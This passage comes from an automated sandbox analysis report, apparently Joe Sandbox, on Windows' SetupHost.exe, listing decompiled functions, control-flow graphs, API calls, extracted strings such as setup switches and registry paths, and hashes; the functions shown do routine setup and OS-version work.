                                                                                                                        • API String ID: 1577575235-3437204702
                                                                                                                        • Opcode ID: dc36d7716912f88b4fa1e1c5cb684a35037d5f6ed23ec405c36e0e7021e98d33
                                                                                                                        • Instruction ID: fa1060cce841dcb120314513e85f7dc4f5efc289916c73d1158b77c5083e888b
                                                                                                                        • Opcode Fuzzy Hash: dc36d7716912f88b4fa1e1c5cb684a35037d5f6ed23ec405c36e0e7021e98d33
                                                                                                                        • Instruction Fuzzy Hash: 2F61E270E003199BDF249B648D95BFDBAB4BF4431CF1045AEE609A7281CBB45E84CB64
                                                                                                                        Function 0054D8F8 Relevance: 38.7, APIs: 10, Strings: 12, Instructions: 165COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1315 54d8f8-54d918 call 54f3b3 1318 54d91a 1315->1318 1319 54d92b-54d937 call 54d460 1315->1319 1320 54d91f-54d926 call 4f9d84 1318->1320 1325 54d948-54d967 CompareStringW 1319->1325 1326 54d939-54d943 call 4f9d84 1319->1326 1329 54da5e-54da6b call 4f9d9c 1320->1329 1327 54daa5-54dabe CompareStringW 1325->1327 1328 54d96d-54d970 call 54d5fc 1325->1328 1326->1329 1331 54dac4-54dae0 CompareStringW 1327->1331 1332 54da3b 1327->1332 1338 54d975-54d979 1328->1338 1344 54da74-54da80 1329->1344 1345 54da6d-54da6f call 4f9b21 1329->1345 1336 54dae2-54dae7 1331->1336 1337 54daec-54daf1 1331->1337 1340 54da40 1332->1340 1341 54da43-54da4c call 4f9c14 1336->1341 1337->1341 1342 54d98a-54d9a9 CompareStringW 1338->1342 1343 54d97b-54d985 call 4f9d84 1338->1343 1340->1341 1341->1320 1358 54da52-54da5c 1341->1358 1342->1332 1348 54d9af-54d9c8 CompareStringW 1342->1348 1343->1329 1349 54da87-54da90 1344->1349 1350 54da82 call 4f9b21 1344->1350 1345->1344 1348->1332 1354 54d9ca-54d9e3 CompareStringW 1348->1354 1356 54da92-54da94 call 4f9b21 1349->1356 1357 54da99-54daa4 call 54f390 1349->1357 1350->1349 1354->1332 1359 54d9e5-54d9fe CompareStringW 1354->1359 1356->1357 1358->1329 1359->1332 1362 54da00-54da19 CompareStringW 1359->1362 1362->1332 1364 54da1b-54da39 CompareStringW 1362->1364 1364->1332 1364->1340
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0054D8FF
                                                                                                                        • CompareStringW.KERNEL32(00000409,00000001,00000000,00000000,Server Core,00000000), ref: 0054DAB4
                                                                                                                        • CompareStringW.KERNEL32(00000409,00000001,00000000,00000000,Server,00000000), ref: 0054DAD3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CompareString$H_prolog3
                                                                                                                        • String ID: Client$Complete$Core$HomeBasic$HomeBasicN$HomePremium$HomePremiumN$Server$Server Core$Starter$StarterN$Unknown
                                                                                                                        • API String ID: 2184196538-3738757907
                                                                                                                        • Opcode ID: 3a348150cd5cc4669ed872027002f01fa7af3fbf2acb0f07e41f880957d9aee7
                                                                                                                        • Instruction ID: 74a647aa6bbc358037e1eee2b3e8bfddb44485393fe181979bcd2577f7a0d705
                                                                                                                        • Opcode Fuzzy Hash: 3a348150cd5cc4669ed872027002f01fa7af3fbf2acb0f07e41f880957d9aee7
                                                                                                                        • Instruction Fuzzy Hash: F651D5706443096BEF14AA658CAAFBE3E39FB61B0DF100519B201AB2D1CBB58D04D764
                                                                                                                        Function 004EAA1D Relevance: 35.5, APIs: 1, Strings: 19, Instructions: 477COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1365 4eaa1d-4eaa56 call 54f3b3 1368 4eaa8c-4eaa90 1365->1368 1369 4eaa58 1365->1369 1370 4eaa99-4eaa9d 1368->1370 1371 4eaa92-4eaa97 1368->1371 1372 4eaa5d-4eaa87 call 4f8ab5 1369->1372 1373 4eaa9f-4eaaa4 1370->1373 1374 4eaaa6-4eaaae 1370->1374 1371->1372 1406 4eaf6d 1372->1406 1373->1372 1376 4eab4d-4eab55 1374->1376 1377 4eaab4-4eaacb call 4e1bc9 1374->1377 1378 4eab57-4eab59 1376->1378 1379 4eabd4-4eabdc 1376->1379 1394 4eaafc-4eab14 call 4ea87f 1377->1394 1395 4eaacd-4eaad4 1377->1395 1382 4eab6c-4eab83 call 4e1bc9 1378->1382 1383 4eab5b-4eab66 call 4f9b21 1378->1383 1384 4eabde-4eabe0 1379->1384 1385 4eac56-4eac5f 1379->1385 1410 4eab94-4eabab call 4ea87f 1382->1410 1411 4eab85 1382->1411 1383->1382 1389 4eabe2-4eabed call 4f9b21 1384->1389 1390 4eabf3-4eac0a call 4e1bc9 1384->1390 1392 4ead1f 1385->1392 1393 4eac65-4eac68 1385->1393 1389->1390 1424 4eac0c-4eac11 1390->1424 1425 4eac16-4eac2d call 4ea87f 1390->1425 1398 4ead24-4ead38 call 4ea87f 1392->1398 1402 4eac6e-4eac72 1393->1402 1403 4ead18-4ead1d 1393->1403 1418 4eab16 1394->1418 1419 4eab43-4eab4a 1394->1419 1405 4eaad7-4eaaf7 call 4f8ab5 1395->1405 1427 4ead3a 1398->1427 1428 4ead44-4ead50 1398->1428 1412 4eac78-4eac7b 1402->1412 1413 4ead11-4ead16 1402->1413 1403->1398 1416 4eaf70-4eaf7c call 4f9d9c 1405->1416 1406->1416 1441 4eabad-4eabb2 1410->1441 1442 4eabb7-4eabc3 1410->1442 1420 4eab8a-4eab8f 1411->1420 1421 4ead0a-4ead0f 1412->1421 1422 4eac81-4eac84 1412->1422 1413->1398 1449 4eaf7e-4eaf80 call 4f9b21 1416->1449 1450 4eaf85-4eaf8a 1416->1450 1429 4eab1b-4eab3e call 4f8ab5 1418->1429 1419->1376 1420->1405 1421->1398 1430 4eac86-4eac8a 1422->1430 1431 4ead03-4ead08 1422->1431 1424->1420 1443 4eac2f 1425->1443 1444 4eac39-4eac45 1425->1444 1427->1428 1437 4ead5c-4ead61 1428->1437 1438 4ead52-4ead59 call 4f9b21 1428->1438 1429->1416 1439 4eacfc-4ead01 1430->1439 1440 4eac8c-4eaca0 1430->1440 1431->1398 1445 4eacca-4eacd2 1437->1445 1438->1437 1439->1398 1483 4eacc7 1440->1483 1484 4eaca2-4eacbf call 4f8a19 1440->1484 1441->1429 1446 4eabcf-4eabd1 1442->1446 1447 4eabc5-4eabcc call 4f9b21 1442->1447 1443->1444 1455 4eac47-4eac4e call 4f9b21 1444->1455 1456 4eac51-4eac53 1444->1456 1458 4eacd8-4eacf0 call 4ea87f 1445->1458 1459 4ead89-4ead8b 1445->1459 1446->1379 1447->1446 1449->1450 1461 4eaf8c call 4f9b21 1450->1461 1462 4eaf91-4eaf93 1450->1462 1455->1456 1456->1385 1489 4ead66-4ead72 1458->1489 1490 4eacf2 1458->1490 1465 4eadbe-4eadc3 1459->1465 1466 4ead8d-4eada5 call 4ea87f 1459->1466 1461->1462 1470 4eaf9c-4eaf9e 1462->1470 1471 4eaf95-4eaf97 call 4f9b21 1462->1471 1479 4eae4f-4eae67 call 4ea87f 1465->1479 1480 4eadc9-4eadcb 1465->1480 1501 4eada7 1466->1501 1502 4eadb1-4eadbb 1466->1502 1475 4eafa7-4eafac 1470->1475 1476 4eafa0-4eafa2 call 4f9b21 1470->1476 1471->1470 1493 4eafae call 4f9b21 1475->1493 1494 4eafb3-4eafb8 1475->1494 1476->1475 1507 4eae69 1479->1507 1508 4eae73-4eae78 1479->1508 1487 4eadcd-4eadd8 call 4f9b21 1480->1487 1488 4eaddb-4eadf2 call 4e1bc9 1480->1488 1483->1445 1529 4eacc4 1484->1529 1487->1488 1516 4eadfe-4eae05 1488->1516 1517 4eadf4 1488->1517 1496 4ead7e-4ead86 1489->1496 1497 4ead74-4ead7b call 4f9b21 1489->1497 1490->1439 1493->1494 1503 4eafbf-4eafc4 1494->1503 1504 4eafba call 4f9b21 1494->1504 1496->1459 1497->1496 1501->1502 1502->1465 1512 4eafcb-4eafd2 call 54f390 1503->1512 1513 4eafc6 call 4f9b21 1503->1513 1504->1503 1507->1508 1518 4eae7c-4eae94 call 4ea87f 1508->1518 1519 4eae7a 1508->1519 1513->1512 1524 4eae0a-4eae22 call 4ea87f 1516->1524 1525 4eae07 1516->1525 1517->1516 1530 4eae96 1518->1530 1531 4eaea0-4eaea5 1518->1531 1519->1518 1533 4eae2e-4eae3d 1524->1533 1534 4eae24 1524->1534 1525->1524 1529->1483 1530->1531 1535 4eaea9-4eaec1 call 4ea87f 1531->1535 1536 4eaea7 1531->1536 1538 4eae3f-4eae41 call 4f9b21 1533->1538 1539 4eae46-4eae4c 1533->1539 1534->1533 1542 4eaecd-4eaee3 call 4ea988 1535->1542 1543 4eaec3 1535->1543 1536->1535 1538->1539 1539->1479 1546 4eaeef-4eaef5 1542->1546 1547 4eaee5 1542->1547 1543->1542 1548 4eaef7-4eaefa 1546->1548 1549 4eaf24-4eaf3e call 4ea87f 1546->1549 1547->1546 1551 4eaefc-4eaf18 call 4ea87f 1548->1551 1552 4eaf4a-4eaf6b 1548->1552 1549->1552 1555 4eaf40 1549->1555 1551->1552 1557 4eaf1a 1551->1557 1552->1406 1555->1552 1557->1549
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EAA24
                                                                                                                          • Part of subcall function 004EA87F: __EH_prolog3.LIBCMT ref: 004EA886
                                                                                                                          • Part of subcall function 004F9B21: GetProcessHeap.KERNEL32(00000000,?,004E7D2F), ref: 004F9B2B
                                                                                                                          • Part of subcall function 004F9B21: HeapFree.KERNEL32(00000000), ref: 004F9B32
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3Heap$FreeProcess
                                                                                                                        • String ID: /AzureHost$/Boot$/ClientId %s$/CopyLogs "%s"$/ExpressPackage$/FlightData %s$/Media$/Package$/Quiet$/Recovery$/ReportId %s$/RollbackSys$/RollbackUser$/RunRollbackScript$/Success$/Update$CSetupHost::CreatePostRebootArgs$SetupHost: Unexpected scenario - defaulting postoobe/rollback commands!$W
                                                                                                                        • API String ID: 2588364637-2629692655
                                                                                                                        • Opcode ID: ed4b61988a26ccaaadd945c1eb046d1a045ed8b369ec54b425ea6d7731d5ff05
                                                                                                                        • Instruction ID: f913f17db20662be1166d779892989a12a2214625351bdbb553d04b51b31d46a
                                                                                                                        • Opcode Fuzzy Hash: ed4b61988a26ccaaadd945c1eb046d1a045ed8b369ec54b425ea6d7731d5ff05
                                                                                                                        • Instruction Fuzzy Hash: C4024070B0025A9BDF15DFA6C891BBE77B5AF44706F10402BE901EB381E778BD118B5A
                                                                                                                        Function 0053DAAA Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,00000000), ref: 0053DADD
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 0053DB2A
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0053DAEB
                                                                                                                          • Part of subcall function 0054086C: GetLastError.KERNEL32(<unnamed>,?,00000000), ref: 005408BE
                                                                                                                          • Part of subcall function 0054086C: memset.MSVCRT ref: 005408E3
                                                                                                                          • Part of subcall function 0054086C: GetProcessHeap.KERNEL32(00000000,?), ref: 0054092F
                                                                                                                          • Part of subcall function 0054086C: HeapAlloc.KERNEL32(00000000), ref: 00540936
                                                                                                                          • Part of subcall function 0054086C: wcsrchr.MSVCRT ref: 0054099E
                                                                                                                        • memset.MSVCRT ref: 0053DB44
                                                                                                                        • RegQueryValueExW.KERNEL32(?,CSDBuildNumber,00000000,?,?,00000206,?,00000000), ref: 0053DB77
                                                                                                                        • RegCloseKey.KERNEL32(?,?,00000000), ref: 0053DB85
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0053DBA0
                                                                                                                        Strings
                                                                                                                        • CSDBuildNumber, xrefs: 0053DB6C
                                                                                                                        • %hs: Failed to read 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber'. Error = %d, xrefs: 0053DC0C
                                                                                                                        • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 0053DAFA, 0053DBAF, 0053DBFB, 0053DC49
                                                                                                                        • %hs: Failed to open 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion'. Error = %d, xrefs: 0053DB0B
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0053DAD1
                                                                                                                        • pGetHostCSDBuildNumber, xrefs: 0053DB06, 0053DBBA, 0053DC07, 0053DC54
                                                                                                                        • %hs: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber' does not exist. Assume 0, xrefs: 0053DBBF
                                                                                                                        • %hs: Registry value 'CSDBuildNumber' is not the correct type (REG_SZ)., xrefs: 0053DC59
                                                                                                                        • pGetHostCSDBuildNumber, xrefs: 0053DAF5, 0053DBAA, 0053DBF6, 0053DC44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heapmemset$AllocCloseOpenProcessQueryValuewcsrchr
                                                                                                                        • String ID: %hs: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber' does not exist. Assume 0$%hs: Failed to open 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion'. Error = %d$%hs: Failed to read 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber'. Error = %d$%hs: Registry value 'CSDBuildNumber' is not the correct type (REG_SZ).$CSDBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion$base\ntsetup\conx\common\setuplib\src\osinfo.cpp$pGetHostCSDBuildNumber$pGetHostCSDBuildNumber
                                                                                                                        • API String ID: 3006269326-936426326
                                                                                                                        • Opcode ID: 7acdd3fd1344b1d69c1b1a50dde4a7d1a94d6d81e882dccfc3d653c5c2d0cf80
                                                                                                                        • Instruction ID: 3f6b739779377b9201bd1af4c9f9e91a674bd0646917bb071bac4f0e6fe4b3e9
                                                                                                                        • Opcode Fuzzy Hash: 7acdd3fd1344b1d69c1b1a50dde4a7d1a94d6d81e882dccfc3d653c5c2d0cf80
                                                                                                                        • Instruction Fuzzy Hash: CF41E77168431CBEDB106B60BC6EFEB3B6CEB24706F204466F505E6282C9B48D019A74
                                                                                                                        Function 004E2F00 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 291memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1587 4e2f00-4e2f57 GetProcessHeap HeapAlloc 1588 4e2f59-4e2f8d UuidCreate call 4fcd57 1587->1588 1589 4e2f91-4e2f99 1587->1589 1588->1589 1591 4e2f9b-4e2fa0 1589->1591 1592 4e2fb0-4e2fbc 1589->1592 1594 4e2fa2 call 4f9d84 1591->1594 1595 4e2fbe-4e2fcd call 4f9c14 1592->1595 1596 4e2fdd-4e2fe9 call 4fb2c2 1592->1596 1601 4e2fa7-4e2fab 1594->1601 1606 4e2fcf-4e2fd1 1595->1606 1607 4e2fd3-4e2fdb 1595->1607 1603 4e2feb-4e2fed call 4f9d84 1596->1603 1604 4e2ff2-4e2ffb call 4f9d9c 1596->1604 1605 4e31e0-4e31e9 call 4f9d9c 1601->1605 1603->1604 1604->1606 1619 4e2ffd-4e3004 call 4fb0b6 1604->1619 1620 4e31eb-4e31ed call 4f9b21 1605->1620 1621 4e31f2-4e31fa 1605->1621 1606->1594 1611 4e303d-4e3043 1607->1611 1612 4e30a4-4e30b2 1611->1612 1613 4e3045-4e3061 call 4f9d9c call 4f9975 1611->1613 1616 4e30d9-4e30f7 memset call 4e23d2 1612->1616 1617 4e30b4-4e30d4 memset call 4e241d call 4e258d 1612->1617 1613->1606 1644 4e3067-4e3070 1613->1644 1639 4e30f9-4e310b call 4f9d84 1616->1639 1640 4e3110-4e3123 call 4e217c 1616->1640 1617->1616 1632 4e3009-4e300d 1619->1632 1620->1621 1627 4e31fc-4e3205 GetProcessHeap HeapFree 1621->1627 1628 4e320b-4e3211 1621->1628 1627->1628 1633 4e3222-4e3228 1628->1633 1634 4e3213-4e321c GetProcessHeap HeapFree 1628->1634 1632->1606 1641 4e300f-4e3014 1632->1641 1635 4e322a-4e3233 GetProcessHeap HeapFree 1633->1635 1636 4e3239-4e323f 1633->1636 1634->1633 1635->1636 1642 4e3250-4e3252 1636->1642 1643 4e3241-4e324a GetProcessHeap HeapFree 1636->1643 1639->1601 1658 4e312f-4e3147 call 4f986b 1640->1658 1659 4e3125 1640->1659 1641->1612 1647 4e301a-4e3033 call 4fb1d4 1641->1647 1648 4e3254-4e325d GetProcessHeap HeapFree 1642->1648 1649 4e3263-4e3279 call 54ea60 1642->1649 1643->1642 1650 4e3079 call 4e217c 1644->1650 1651 4e3072-4e3077 call 4e1fc3 1644->1651 1647->1606 1665 4e3035 1647->1665 1648->1649 1664 4e307e-4e3084 1650->1664 1651->1664 1668 4e315d-4e315f 1658->1668 1669 4e3149-4e3158 call 4f9d84 1658->1669 1659->1658 1664->1591 1667 4e308a-4e308c 1664->1667 1665->1611 1670 4e308e-4e309e GetProcessHeap HeapFree 1667->1670 1671 4e30a2 1667->1671 1673 4e316d-4e317e call 4f9c14 1668->1673 1674 4e3161-4e3168 call 4f9b21 1668->1674 1669->1601 1670->1671 1671->1612 1673->1669 1680 4e3180-4e3186 call 4f8b23 1673->1680 1674->1673 1682 4e318b-4e3193 1680->1682 1683 4e31a6-4e31dc call 4eee5d * 2 1682->1683 1684 4e3195-4e31a4 call 4f9d84 1682->1684 1683->1605 1684->1605
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000090), ref: 004E2F44
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004E2F4B
                                                                                                                        • UuidCreate.RPCRT4(?), ref: 004E2F6F
                                                                                                                          • Part of subcall function 004FCD57: memset.MSVCRT ref: 004FCD9B
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,CorrelationVector,?), ref: 004E3091
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004E3098
                                                                                                                        • memset.MSVCRT ref: 004E30BC
                                                                                                                        • memset.MSVCRT ref: 004E30E1
                                                                                                                          • Part of subcall function 004F986B: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000081,?,004E3143,?,?,?), ref: 004F995F
                                                                                                                          • Part of subcall function 004F986B: HeapFree.KERNEL32(00000000,?,004E3143,?,?,?), ref: 004F9966
                                                                                                                          • Part of subcall function 004EEE5D: GetProcessHeap.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,004FB3D8,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 004EEE6B
                                                                                                                          • Part of subcall function 004EEE5D: HeapFree.KERNEL32(00000000), ref: 004EEE72
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004E31FE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004E3205
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004E3215
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004E321C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004E322C
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004E3233
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004E3243
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004E324A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E3256
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004E325D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$memset$AllocCreateUuid
                                                                                                                        • String ID: CorrelationVector$SYSTEM\Setup\MoSetup
                                                                                                                        • API String ID: 858379666-2351024219
                                                                                                                        • Opcode ID: 77510b38390af33a1a97f21331bc8bd46ceb3793d53e2838af10e129f8220e8b
                                                                                                                        • Instruction ID: 3929af2ecd6177a942f84fef82e280d6d2e73038fa0d8849c2b63620a4d76d68
                                                                                                                        • Opcode Fuzzy Hash: 77510b38390af33a1a97f21331bc8bd46ceb3793d53e2838af10e129f8220e8b
                                                                                                                        • Instruction Fuzzy Hash: BAA1B6716083419BC711EF76D899B2FB7E8AFD8706F00092EF94587251DB78DA088B96
                                                                                                                        Function 0054086C Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 233memorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(<unnamed>,?,00000000), ref: 005408BE
                                                                                                                        • memset.MSVCRT ref: 005408E3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0054092F
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00540936
                                                                                                                        • wcsrchr.MSVCRT ref: 0054099E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 00540A37
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 00540A3E
                                                                                                                        • TlsGetValue.KERNEL32(?,?), ref: 00540A4A
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00540A98
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00540AE6
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00540AED
                                                                                                                        • ExitProcess.KERNEL32 ref: 00540AFF
                                                                                                                        • RaiseException.KERNEL32(C0000025,00000001,00000000,00000000), ref: 00540B17
                                                                                                                        • SetLastError.KERNEL32(?), ref: 00540B21
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ErrorFreeLast$AllocCurrentExceptionExitRaiseThreadValuememsetwcsrchr
                                                                                                                        • String ID: <unknown>$<unnamed>$C:\$Windows.~WS\Sources\SetupHost.Exe$Def$(T
                                                                                                                        • API String ID: 2945306065-2719663207
                                                                                                                        • Opcode ID: 3f480d1f98192b52c2fd5b8bfe94a8fb2b9eafd2452ff8ddd88c15c04cb3f12f
                                                                                                                        • Instruction ID: 7c756117f4d10f6388f998e26725e033998b6abc64823cbaf41811a83983f2ae
                                                                                                                        • Opcode Fuzzy Hash: 3f480d1f98192b52c2fd5b8bfe94a8fb2b9eafd2452ff8ddd88c15c04cb3f12f
                                                                                                                        • Instruction Fuzzy Hash: DA81B932604301AFDB109F64DC59BABBBE9FB88719F14491DFA89D72A0D730D904DB92
                                                                                                                        Function 00547803 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 182memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wfopen.MSVCRT ref: 00547835
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000200), ref: 00547859
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00547860
                                                                                                                        • fgetws.MSVCRT ref: 0054787B
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 005478C4
                                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 005478CB
                                                                                                                        • fgetws.MSVCRT ref: 005478F6
                                                                                                                        • feof.MSVCRT ref: 00547906
                                                                                                                        • iswctype.MSVCRT ref: 0054793D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00547968
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0054796F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0054797B
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00547982
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00547998
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0054799F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005479AA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 005479B1
                                                                                                                        • swscanf_s.MSVCRT ref: 005479D9
                                                                                                                          • Part of subcall function 005475AB: _wcsicmp.MSVCRT ref: 005475DB
                                                                                                                          • Part of subcall function 005475AB: _wcsicmp.MSVCRT ref: 00547622
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Alloc$Free_wcsicmpfgetws$_wfopenfeofiswctypeswscanf_s
                                                                                                                        • String ID: %s %[^]
                                                                                                                        • API String ID: 1979924226-2460127861
                                                                                                                        • Opcode ID: 5ef35065991bc72738f7ef94b9e5751db236058d8f9aeb1976e0af83dad94b93
                                                                                                                        • Instruction ID: 38de0c9ac957d563a65a53cab135f258421fe2d7ec5369bf063f4bcb60d71142
